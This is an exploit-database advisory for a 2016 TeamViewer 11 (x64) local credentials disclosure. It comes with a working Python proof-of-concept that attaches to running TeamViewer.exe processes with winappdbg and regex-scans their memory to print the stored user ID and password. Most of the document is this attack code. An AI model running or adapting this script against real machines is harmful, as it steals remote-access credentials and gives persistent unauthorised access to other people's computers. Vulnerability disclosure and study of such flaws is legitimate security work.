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TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure
##### # TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure # Tested on Windows 7 64bit, English # Vendor Homepage @ https://www.teamviewer.com/ # Date 07/09/2016 # Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik) # # http://www.korznikov.com | @nopernik # # Special Thanks to: # Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/) # Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml) # ##### # TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process. # There is no need in privilege account access. Credentials are stored in context of regular user. # A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services. # # Proof-Of-Concept Code: ##### from winappdbg import Debug, Process, HexDump import sys import re filename = 'TeamViewer.exe' def memory_search( pid ): found = [] # Instance a Process object. process = Process( pid ) # Search for the string in the process memory. # Looking for User ID: userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]' for address in process.search_regexp( userid_pattern ): found += [address] print 'Possible UserIDs found:' found = [i[-1] for i in found] for i in set(found): print i.replace('\x00','') found = [] # Looking for Password: pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00' for address in process.search_regexp( pass_pattern ): found += [process.read(address[0]-3,16)] if found: print '\nPassword:' if len(found) > 1: s = list(set([x for x in found if found.count(x) > 1])) for i in s: pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0] print pwd else: print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0] return found debug = Debug() try: # Lookup the currently running processes. debug.system.scan_processes() # For all processes that match the requested filename... for ( process, name ) in debug.system.find_processes_by_filename( filename ): pid = process.get_pid() memory_search(pid) finally: debug.stop() # 0day.today [2024-12-27] #